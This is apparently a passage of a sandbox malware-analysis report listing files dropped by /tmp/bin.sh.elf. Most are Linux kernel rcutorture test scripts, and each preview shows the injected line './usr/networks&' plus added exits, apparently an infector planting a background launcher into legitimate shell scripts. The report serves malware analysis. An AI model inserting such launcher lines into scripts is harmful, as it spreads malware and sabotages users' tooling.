                                                                  File Type:awk or perl script, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):479
                                                                  Entropy (8bit):4.802626275594296
                                                                  Encrypted:false
                                                                  SSDEEP:6:wsFl4xaKy86WqGCePeGDPahXM6WqGIKmALledQhFo8sFRMoFoPsjsFPTJPsCFo2S:jnW1EIlahDFSPHPs92wWqBBOcwBjqn
                                                                  MD5:4F3513DA08C974EC143E30317C75475C
                                                                  SHA1:454B5F2CE62176AC272F38E13BC64755135FD85A
                                                                  SHA-256:DF6564EBE393B5B248466634AAF1928DF89FFD5C4A0E88E796DD1537AE47D8B2
                                                                  SHA-512:7F95742A9E7829C8867F6DA2E68C0B8757EB93CDFBEA42F41D48699795CCE33C9824697BAAAFE817B580CCE1DDF73ABA6F9D0D530B5992B8AF20DB84710F67BF
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 0.fi.ncpus=`grep '^processor' /proc/cpuinfo | wc -l`.idlecpus=`mpstat | tail -1 | \..awk -v ncpus=$ncpus '{ print ncpus * ($7 + $NF) / 100 }'`.awk -v ncpus=$ncpus -v idlecpus=$idlecpus < /dev/null '.BEGIN {..cpus2use = idlecpus;..if (cpus2use < 1)...cpus2use = 1;..if (cpus2use < ncpus / 10)...cpus2use = ncpus / 10;..if (cpus2use == int(cpus2use))...cpus2use = int(cpus2use)..else...cpus2use = int(cpus2use) + 1..print cpus2use;.}'.../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3848
                                                                  Entropy (8bit):5.4362980099954585
                                                                  Encrypted:false
                                                                  SSDEEP:96:aXqy/tAq8JV/VooTklj+kapJbV1hctBryYBfVqebVBE+0AXvHdTcwu9gZUcu8rkO:aBQH/HklUp5FctN7zB0A/pcwu2Ucu8rV
                                                                  MD5:3C47B98461A46FCFC4CF9B6605E3C812
                                                                  SHA1:04169142D0A3787759B050016D591E76DF0D6E03
                                                                  SHA-256:F66C090A9F517F78039B6FB52141B9FBB2B7EEACE681010C78CC181279F2F7E0
                                                                  SHA-512:A14536321412C34FC5EC96702FF91B3BF06C43A0602B4C5700E94F7562EDC108D0F8F1EB65A19489AEE1F51DDE89D804C1C08C29D3707685593BAFCA17D060E2
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit -1..fi..grep -q '^CONFIG_HOTPLUG_CPU=y$' "$1".}..# identify_boot_image qemu-cmd.#.# Returns the relative path to the kernel build image. This will be.# arch/<arch>/boot/bzImage or vmlinux if bzImage is not a target for the.# architecture, unless overridden with the TORTURE_BOOT_IMAGE environment.# variable..identify_boot_image () {..if test -n "$TORTURE_BOOT_IMAGE"..then...echo $TORTURE_BOOT_IMAGE..else...case "$1" in...qemu-system-x86_64|qemu-system-i386)....echo arch/x86/boot/bzImage....;;...qemu-system-aarch64)....echo arch/arm64/boot/Image....;;...*)....echo vmlinux....;;...esac..fi.}..# identify_qemu builddir.#.# Returns our best guess as to which qemu command is appropriate for.# the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable..identify_qemu () {..local u="`file "$1"`"..if test -n "$TORTURE_QEMU_CMD"..then...echo $TORTURE_QEMU_CMD..elif echo $u | grep -q x86-64..then...echo qemu-system-x86_64..elif echo $u | grep -q "Intel 8038
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1191
                                                                  Entropy (8bit):5.219919938951854
                                                                  Encrypted:false
                                                                  SSDEEP:24:Mm/+2DKmCzxOGZDwml1NebqBhRpOVPsn0kFIj1XI7q:Mm/+22PZDwmlHBRpORsPwXb
                                                                  MD5:AE4B164E324E2725E5875DC6ACEE1139
                                                                  SHA1:714938D3C8B76FC6D9B47129E3B53A1D92AAD811
                                                                  SHA-256:0AE66B27CDC6DA8C66AC49B9E0271DA8486C10C373FABA74100A880C54CA3842
                                                                  SHA-512:8456D1C81C695A761FAFB1C3B794C4E46718815135D44D775DF744B54E82C74D59E5DDA11B6D9FBAA0CF2712CD8E25A95ABCE8344EBE69143C4CC8FCC5E07997
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 0;..fi...# Set affinity to randomly selected online CPU..cpus=`grep 1 /sys/devices/system/cpu/*/online |...sed -e 's,/[^/]*$,,' -e 's/^[^0-9]*//'`...# Do not leave out poor old cpu0 which may not be hot-pluggable..if [ ! -f "/sys/devices/system/cpu/cpu0/online" ]; then...cpus="0 $cpus"..fi...cpumask=`awk -v cpus="$cpus" -v me=$me -v n=$n 'BEGIN {...srand(n + me + systime());...ncpus = split(cpus, ca);...curcpu = ca[int(rand() * ncpus + 1)];...mask = lshift(1, curcpu);...if (mask + 0 <= 0)....mask = 1;...printf("%#x\n", mask);..}' < /dev/null`..n=$(($n+1))..if ! taskset -p $cpumask $$ > /dev/null 2>&1..then...echo taskset failure: '"taskset -p ' $cpumask $$ '"'...exit 1..fi...# Sleep a random duration..sleeptime=`awk -v me=$me -v n=$n -v sleepmax=$sleepmax 'BEGIN {...srand(n + me + systime());...printf("%06d", int(rand() * sleepmax));..}' < /dev/null`..n=$(($n+1))..sleep .$sleeptime...# Spin a random duration..limit=`awk -v me=$me -v n=$n -v spinmax=$spinmax 'BEGI
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):719
                                                                  Entropy (8bit):5.456071477133004
                                                                  Encrypted:false
                                                                  SSDEEP:12:w6rMJ4mgtD51pbKRmY2uH5SY7d3VOAan69dAeuVuYFFses4mseowZExeskWnn:E2mi51xXYZZS23VOCT7uVPS8VkWn
                                                                  MD5:0E3CB1C0055AFADC1C754205DE278D67
                                                                  SHA1:4059B70FD319BCF46F1DD180C2BD65919CCDEB74
                                                                  SHA-256:70B7C3D2E18D82326962A335B5A0BC3B19DCE6A56735FA172C15452C98FB7905
                                                                  SHA-512:FE8CDCBB9341CA257E0F7B9AC7D4A0AF88A2CD7A87D5DAE0E4D5A0108B65498032FDFDA5D62FA262B0067D9B6937FC408E4021568D5243696007945CE2776A39
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi.resdir=${2}..T=${TMPDIR-/tmp}/test-linux.sh.$$.trap 'rm -rf $T' 0.mkdir $T..cp ${config_template} $T/config.cat << ___EOF___ >> $T/config.CONFIG_INITRAMFS_SOURCE="$TORTURE_INITRD".CONFIG_VIRTIO_PCI=y.CONFIG_VIRTIO_CONSOLE=y.___EOF___..configinit.sh $T/config $resdir.retval=$?.if test $retval -gt 1.then..exit 2.fi.ncpus=`cpus2use.sh`.make -j$ncpus $TORTURE_KMAKE_ARG > $resdir/Make.out 2>&1.retval=$?.if test $retval -ne 0 || grep "rcu[^/]*": < $resdir/Make.out | egrep -q "Stop|Error|error:|warning:" || egrep -q "Stop|Error|error:" < $resdir/Make.out.then..echo Kernel build error..egrep "Stop|Error|error:|warning:" < $resdir/Make.out..echo Run aborted...exit 3.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):96
                                                                  Entropy (8bit):4.256066773559547
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVaywJejG2aKJLUQSXVOORgn:wCej/BZHSMn
                                                                  MD5:47B2DFB43AC8D11D8AF9C54AFB92BF3A
                                                                  SHA1:C98675863C1D74A923FD89014918FC45F6C9A3C6
                                                                  SHA-256:433231EE364303B5E085E5AB83E628F522958244F525CB015D4E4CA226AEACA7
                                                                  SHA-512:F756226C69A6AE738A092D1DA5E1C6472C21B27CCE6735FCE5AF7EF49868E9F3177900AE6B4960B68E2EA7B737295DEB44F3805F94EC55853929CAEC6301B137
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.else..echo No errors in console logs...exit 0.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:awk or perl script, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):579
                                                                  Entropy (8bit):4.968576899007941
                                                                  Encrypted:false
                                                                  SSDEEP:12:w6vHIjs/NbRQG9GtcDVKZqCi8wBQ9fFs40ldvcPXVfgeYn:rfDQhKDwZ/L9Ns+vV49
                                                                  MD5:979991AFA6A7D7425AD7C067CD5C6AC2
                                                                  SHA1:4EBE72228115109BA3DD14F4649ABC2CE27692FF
                                                                  SHA-256:8C0805B46010E232FBCB8D6AD91D98A6168CC25A1FA5E7D766F7129F1314BCF2
                                                                  SHA-512:332AD2A7823972D06AFD2AE52A46D266AE4FA40FC2C8A4DB9B3B902BE0696476286726AD06391A769477EEA0E57FD17CC6234D079FAD5C83755AAFD249303329
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..configfile=`echo $i | sed -e 's/^.*\///'`.ncs=`grep "Writes: Total:" $i/console.log 2> /dev/null | tail -1 | sed -e 's/^.* Total: //' -e 's/ .*$//'`.if test -z "$ncs".then..echo "$configfile -------".else..title="$configfile ------- $ncs acquisitions/releases"..dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`..if test -z "$dur"..then...:..else...ncsps=`awk -v ncs=$ncs -v dur=$dur '....BEGIN { print ncs / dur }' < /dev/null`...title="$title ($ncsps per second)"..fi..echo $title.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:awk or perl script, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1557
                                                                  Entropy (8bit):5.128177512727413
                                                                  Encrypted:false
                                                                  SSDEEP:48:/ji7NQQ1mNOtOsl8GpG0YrvBn02WEnxxCXt8ommYlmrBsmUb:yQ1NSjpGHB8dtY8rTI
                                                                  MD5:F5785CDFA33136A153C917D211A23D17
                                                                  SHA1:04D08AB0A9604A35EB9912BCD6DF4CFCB8617D08
                                                                  SHA-256:5BA323C0D42BFCFED74609EF4CDC517ABBF570B1EAE841338B1B8E9BC7759750
                                                                  SHA-512:CBDAB4C924405CC4EED685679CD3FAC08B46E9C7E2CBDDE37ABFB1E18325223E344DCEC947DC35231B7B4B6B75A77B25B7CEFA418D91EF8B7A8AF9B31851DFA3
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi.. functions.sh..configfile=`echo $i | sed -e 's/^.*\///'`.ngps=`grep ver: $i/console.log 2> /dev/null | tail -1 | sed -e 's/^.* ver: //' -e 's/ .*$//'`.stopstate="`grep 'End-test grace-period state: g' $i/console.log 2> /dev/null |.. tail -1 | sed -e 's/^\[[ 0-9.]*] //' |.. awk '{ print \"[\" $1 \" \" $5 \" \" $6 \" \" $7 \"]\"; }' |.. tr -d '\012\015'`".if test -z "$ngps".then..echo "$configfile ------- " $stopstate.else..title="$configfile ------- $ngps GPs"..dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`..if test -z "$dur"..then...:..else...ngpsps=`awk -v ngps=$ngps -v dur=$dur '....BEGIN { print ngps / dur }' < /dev/null`...title="$title ($ngpsps/s)"..fi..echo $title $stopstate..nclosecalls=`grep --binary-files=text 'torture: Reader Batch' $i/console.log | tail -1 | awk '{for (i=NF-8;i<=NF;i++) sum+=$i; } END {print sum}'`..if test -z "$nclosecalls"..then...exit 0..fi..if test "$nclosecalls" -eq 0..then.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2182
                                                                  Entropy (8bit):5.113870463978564
                                                                  Encrypted:false
                                                                  SSDEEP:24:6Ee9Ov1jq+6vTZG7TdvOV9CGW59gYHh+5x/BQlG8OW+oE0+EV0eW+vB/0HL0MmSI:6lvTs709ClcnG5B/6/8bBFXcl2U/172Z
                                                                  MD5:69C65F8778291988E21922FB456C3C52
                                                                  SHA1:9D380BDC43853D325A4BC9FF35D0A7BC9AAD1D87
                                                                  SHA-256:A49DB2EE35BB00FD042DF74EEC201078948581ED9577EBB2443968CF2F6812A3
                                                                  SHA-512:F908D32300B1BF298EDC4BDB658383B94A6E8417CCFA24A925E22E6F398AD730F776EA820958F757C25731A9FCFBAFD11AB58F5BC5F0ADEECF8A4A773DC6E213
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 10.fi..sed -e 's/^\[[^]]*]//' < $i/console.log |.grep 'us : rcu_exp_grace_period' |.sed -e 's/us : / : /' |.tr -d '\015' |.awk '.$8 == "start" {..if (startseq != "")...nlost++;..starttask = $1;..starttime = $3;..startseq = $7;..seqtask[startseq] = starttask;.}..$8 == "end" {..if (startseq == $7) {...curgpdur = $3 - starttime;...gptimes[++n] = curgpdur;...gptaskcnt[starttask]++;...sum += curgpdur;...if (curgpdur > 1000)....print "Long GP " starttime "us to " $3 "us (" curgpdur "us)";...startseq = "";..} else {...# Lost a message or some such, reset....startseq = "";...nlost++;..}.}..$8 == "done" && seqtask[$7] != $1 {..piggybackcnt[$1]++;.}..END {..newNR = asort(gptimes);..if (newNR <= 0) {...print "No ftrace records found???"...exit 10;..}..pct50 = int(newNR * 50 / 100);..if (pct50 < 1)...pct50 = 1;..pct90 = int(newNR * 90 / 100);..if (pct90 < 1)...pct90 = 1;..pct99 = int(newNR * 99 / 100);..if (pct99 < 1)...pct99 = 1;..div = 10 ** int(log(gptimes[pct90]) / log(10
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1647
                                                                  Entropy (8bit):5.17716483084646
                                                                  Encrypted:false
                                                                  SSDEEP:24:SWaDjwbwpaqsMmffs+6QW595Hh+6x/BQlG8OW+oE0+EV0eW+vB/0HL0UjlJS+9XT:gwbwMqsVCRcsG5B/6/FXcl2U/1t2
                                                                  MD5:9AF4AC39ECDDFCA8A34238215BAD591B
                                                                  SHA1:666B7D95D28D4A8A6F11105BA524B700BF7D67A3
                                                                  SHA-256:4FA88C47323E7104E9A7B759A508845D5B3039AEB16D3E33384FF870D29D367B
                                                                  SHA-512:4F1B991BD2D70824B8E31E88DED646A90DB7E99BDAF4E9CD236099BCCF125F576BE289C643A2D80C01FA8987D2C3769078D7B2E5B2815055AB1F191E488B97AA
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi.PATH=`pwd`/tools/testing/selftests/rcutorture/bin:$PATH; export PATH.. functions.sh..if kvm-recheck-rcuperf-ftrace.sh $i.then..# ftrace data was successfully analyzed, call it good!..exit 0.fi..configfile=`echo $i | sed -e 's/^.*\///'`..sed -e 's/^\[[^]]*]//' < $i/console.log |.awk './-perf: .* gps: .* batches:/ {..ngps = $9;..nbatches = $11;.}../-perf: .*writer-duration/ {..gptimes[++n] = $5 / 1000.;..sum += $5 / 1000.;.}..END {..newNR = asort(gptimes);..if (newNR <= 0) {...print "No rcuperf records found???"...exit;..}..pct50 = int(newNR * 50 / 100);..if (pct50 < 1)...pct50 = 1;..pct90 = int(newNR * 90 / 100);..if (pct90 < 1)...pct90 = 1;..pct99 = int(newNR * 99 / 100);..if (pct99 < 1)...pct99 = 1;..div = 10 ** int(log(gptimes[pct90]) / log(10) + .5) / 100;..print "Histogram bucket size: " div;..last = gptimes[1] - 10;..count = 0;..for (i = 1; i <= newNR; i++) {...current = div * int(gptimes[i] / div);...if (last == current) {....count++;...} else {....if (
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):6480
                                                                  Entropy (8bit):5.302615493815468
                                                                  Encrypted:false
                                                                  SSDEEP:192:UW7mo8L6zCQaO59QRYE7uz+jO+O81DhfoaDSl4choF5NDI:UWzzzCXa0YE7uztdQDhAamlVhoF5NDI
                                                                  MD5:44DEEDB4AE1B9A70CF6C582D4342BB80
                                                                  SHA1:DCA684F2C6BD5E87F8F44E388EB7DBDEA4810B07
                                                                  SHA-256:D5C180BFF335FF5F0A0E4E009CBE129588365A187A7A9F71E2C53F2AB4E1A674
                                                                  SHA-512:72D81A95E8A725BF91D50789F058D4C23452DAA6D62F500255C4965E91756B4DC38F2FE743A300ABF085DC11DA8B804E442420A4BE8CEF88BCC7EFF896DFC7AC
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi.echo ' ---' `date`: Starting build.echo ' ---' Kconfig fragment at: $config_template >> $resdir/log.touch $resdir/ConfigFragment.input $resdir/ConfigFragment.if test -r "$config_dir/CFcommon".then..echo " --- $config_dir/CFcommon" >> $resdir/ConfigFragment.input..cat < $config_dir/CFcommon >> $resdir/ConfigFragment.input..config_override.sh $config_dir/CFcommon $config_template > $T/Kc1..grep '#CHECK#' $config_dir/CFcommon >> $resdir/ConfigFragment.else..cp $config_template $T/Kc1.fi.echo " --- $config_template" >> $resdir/ConfigFragment.input.cat $config_template >> $resdir/ConfigFragment.input.grep '#CHECK#' $config_template >> $resdir/ConfigFragment.if test -n "$TORTURE_KCONFIG_ARG".then..echo $TORTURE_KCONFIG_ARG | tr -s " " "\012" > $T/cmdline..echo " --- --kconfig argument" >> $resdir/ConfigFragment.input..cat $T/cmdline >> $resdir/ConfigFragment.input..config_override.sh $T/Kc1 $T/cmdline > $T/Kc2..# Note that "#CHECK#" is not permitted on commandline.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:awk or perl script, ASCII text, with very long lines (378)
                                                                  Category:dropped
                                                                  Size (bytes):11017
                                                                  Entropy (8bit):5.6019167894868325
                                                                  Encrypted:false
                                                                  SSDEEP:192:kfJ9dYxMSf4uZqtpi0SwJjZhevAw+N/w7HD/29w36HVn+7A05qBLUbIQbthh:kfJTIMSf4uZqtBSwvHN/w7j/29wGVn+L
                                                                  MD5:B167C149D77482F3615457A85A7C5536
                                                                  SHA1:CF3BEF44B1E9EC81075A3F675AD3888139E8B7FA
                                                                  SHA-256:432C7CA4ABC3FBB331A1707A953FB4E5896D78DD6DE367FF4BB990BBBFB62FF9
                                                                  SHA-512:0C3B520C282ED66588D576DF270664C6EF4FFDCCBF239930EE30DF4BF834F30CF8D8633D0704A8743888F814862E170425F83FF7BDAB453E1E5727009CF94EE2
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.}..while test $# -gt 0.do..case "$1" in..--bootargs|--bootarg)...checkarg --bootargs "(list of kernel boot arguments)" "$#" "$2" '.*' '^--'...TORTURE_BOOTARGS="$2"...shift...;;..--bootimage)...checkarg --bootimage "(relative path to kernel boot image)" "$#" "$2" '[a-zA-Z0-9][a-zA-Z0-9_]*' '^--'...TORTURE_BOOT_IMAGE="$2"...shift...;;..--buildonly)...TORTURE_BUILDONLY=1...;;..--configs|--config)...checkarg --configs "(list of config files)" "$#" "$2" '^[^/]*$' '^--'...configs="$2"...shift...;;..--cpus)...checkarg --cpus "(number)" "$#" "$2" '^[0-9]*$' '^--'...cpus=$2...TORTURE_ALLOTED_CPUS="$2"...shift...;;..--datestamp)...checkarg --datestamp "(relative pathname)" "$#" "$2" '^[^/]*$' '^--'...ds=$2...shift...;;..--defconfig)...checkarg --defconfig "defconfigtype" "$#" "$2" '^[^/][^/]*$' '^--'...TORTURE_DEFCONFIG=$2...shift...;;..--dryrun)...checkarg --dryrun "sched|script" $# "$2" 'sched\|script' '^--'...dryrun=$2...shift...;;..--duration)...checkarg --duration "(
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:C source, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3043
                                                                  Entropy (8bit):5.211893461133884
                                                                  Encrypted:false
                                                                  SSDEEP:48:F1ZBW8oMIGWzbk4rwEJOrWKb9DvFYx5FXAm1QZyGZXgs9DQV09keu0KbcxyHcXEp:F1c84rbOyk9DebFQvyGJgsUPWxyHWEp
                                                                  MD5:1F2A5D60152141EFC8709F27266DCB41
                                                                  SHA1:9380E59CEB5522297EF8A768DF0099AC42135957
                                                                  SHA-256:9777F28693F71100B44B3FDC2572D85544C9C79F7C72717EAE62338310D5E649
                                                                  SHA-512:B72525791FBB0F3CC7126D4B3F09FD8D2A3BFEC8279F4578F5EF99E250BCD8F87C7B663E1B323F8D1C51C45E276A1E1DB09FD2980C9AE3D17C39356F16527E86
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.[ -z "$D" ] && echo >&2 "No argument supplied" && exit 1.if [ ! -d "$D" ]; then. echo >&2 "$D does not exist: Malformed kernel source tree?". exit 1.fi.if [ -s "$D/initrd/init" ]; then. echo "$D/initrd/init already exists, no need to create it". exit 0.fi..T=${TMPDIR-/tmp}/mkinitrd.sh.$$.trap 'rm -rf $T' 0 2.mkdir $T..cat > $T/init << '__EOF___'.#!/bin/sh.# Run in userspace a few milliseconds every second. This helps to.# exercise the NO_HZ_FULL portions of RCU. The 192 instances of "a" was.# empirically shown to give a nice multi-millisecond burst of user-mode.# execution on a 2GHz CPU, as desired. Modern CPUs will vary from a.# couple of milliseconds up to perhaps 100 milliseconds, which is an.# acceptable range..#.# Why not calibrate an exact delay? Because within this initrd, we.# are restricted to Bourne-shell builtins, which as far as I know do not.# provide any means of obtaining a fine-grained timestamp...a4="a a a a".a16="$a4 $a4 $a4 $a4".a64="$
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):440
                                                                  Entropy (8bit):4.763089121502071
                                                                  Encrypted:false
                                                                  SSDEEP:6:w6vCiRoM3084xva2SjUxTBxusvt+b2Fq4xTBxexvus1exTBxw8vXWRJxw8vqRyPf:w6vCi9308p26DLdeZW/amIHWfK4n
                                                                  MD5:5BD12FE7C8C716573A9C2440489F66D5
                                                                  SHA1:0E0DBAB9D91E1477B4DD25C9DF8CA21CC1ED685E
                                                                  SHA-256:1D395E276AF9F8C40ED69F34CABDDEF7A84DA9A61044A8A686C1AA1E552F4EBB
                                                                  SHA-512:BBD5B97062BB22CF0F22DBC204DED6F02220226BBBCA45E6AE1498C14B6C40E4DFDF9145B21E46FDD47F04EB7A0125215FDA26DAAAF24E642D5BD317365D0D02
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..if grep -q "error:" < $F.then..print_bug $title build errors:..grep "error:" < $F..exit 2.fi..grep warning: < $F > $T/warnings.grep "include/linux/*rcu*\.h:" $T/warnings > $T/hwarnings.grep "kernel/rcu/[^/]*:" $T/warnings > $T/cwarnings.cat $T/hwarnings $T/cwarnings > $T/rcuwarnings.if test -s $T/rcuwarnings.then..print_warning $title build errors:..cat $T/rcuwarnings..exit 2.fi.exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:awk or perl script, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3346
                                                                  Entropy (8bit):5.221477851845867
                                                                  Encrypted:false
                                                                  SSDEEP:96:KV10en3z5OT8O/tW5BHo8vHMHeHbzsHCHzxLXH:KrD5W3/Y59o8PA+/g6lLXH
                                                                  MD5:B0BFAAC54A7134DCFF782734D469AFB4
                                                                  SHA1:D9901011FD87AF6CE19A8DE2A8EF7A3B0E64F47E
                                                                  SHA-256:035123E62082D161C1073A280DED4376FE8896FB8579AD87A9735470BC0426E0
                                                                  SHA-512:6C584E4245ADD2C9F1AB92A8C540D8C69B02237F1CB7B04397ACBE0538897C2588269CA50105553985EC0B2E2850BDC315D6AC9DDFC5087A78A9D833D9A5BE19
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi.if grep -Pq '\x00' < $file.then..print_warning Console output contains nul bytes, old qemu still running?.fi.cat /dev/null > $file.diags..# Check for proper termination, except that rcuperf runs don't indicate this..if test "$TORTURE_SUITE" != rcuperf.then..# check for abject failure...if grep -q FAILURE $file || grep -q -e '-torture.*!!!' $file..then...nerrs=`grep --binary-files=text '!!!' $file |...tail -1 |...awk '...{....for (i=NF-8;i<=NF;i++).....sum+=$i;...}...END { print sum }'`...print_bug $title FAILURE, $nerrs instances...exit..fi...grep --binary-files=text 'torture:.*ver:' $file |..egrep --binary-files=text -v '\(null\)|rtc: 000000000* ' |..sed -e 's/^(initramfs)[^]]*] //' -e 's/^\[[^]]*] //' |..awk '..BEGIN.{...ver = 0;...badseq = 0;...}....{...if (!badseq && ($5 + 0 != $5 || $5 <= ver)) {....badseqno1 = ver;....badseqno2 = $5;....badseqnr = NR;....badseq = 1;...}...ver = $5...}...END.{...if (badseq) {....if (badseqno1 == badseqno2 && badseqno2 ==
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1723
                                                                  Entropy (8bit):5.244148997020697
                                                                  Encrypted:false
                                                                  SSDEEP:48:HUYh+e1GOsVHdX9wVzPfkCx9BF/5EneTtiLcZqMqxzcoaBFF:HUYOO+wzjnBvEnutec4DFaBFF
                                                                  MD5:4469B917A8A4B3B4430DF7D1A1BA0167
                                                                  SHA1:66D0537A41CE66007719B735969E97511BC53AB2
                                                                  SHA-256:1196A906EA766E04AF8FCA2C4066AF2BF3747997E3A0B78D68F727ECDBC72374
                                                                  SHA-512:58CBAA85AB371CE0D6A09D55047ACBA96D4708A8AA9F9662927666C8154BD67B45E4938CEF6CFE4763C971D581CA8D0CE7089DA7C6D13D07E2CA228FDC9DDEF1
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 99.fi..if test "x$1" = "x--should-pass"; then..should_pass="yes".elif test "x$1" = "x--should-fail"; then..should_pass="no".else..echo "Unrecognized argument '$1'" 1>&2...# Exit code 99 indicates a hard error...exit 99.fi..CBMC=${CBMC:-cbmc}..SYNC_SRCU_MODE=${SYNC_SRCU_MODE:-simple}..case ${SYNC_SRCU_MODE} in.kernel) sync_srcu_mode_flags="" ;;.simple) sync_srcu_mode_flags="-DUSE_SIMPLE_SYNC_SRCU" ;;..*)..echo "Unrecognized argument '${SYNC_SRCU_MODE}'" 1>&2..exit 99..;;.esac..min_cpus_fail=1..c_file=`dirname "$2"`/test.c..# Source the input file... $2..if test ${min_cpus_fail} -gt 2; then..default_default_cpus=${min_cpus_fail}.else..default_default_cpus=2.fi.default_cpus=${default_cpus:-${default_default_cpus}}.cpus=${NR_CPUS:-${default_cpus}}..# Check if there are two few cpus to make the test fail..if test $cpus -lt ${min_cpus_fail:-0}; then..should_pass="yes".fi..cbmc_opts="-DNR_CPUS=${cpus} ${sync_srcu_mode_flags} ${test_cbmc_options} ${CBMC_FLAGS}"..echo "Run
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1441
                                                                  Entropy (8bit):5.520351213592847
                                                                  Encrypted:false
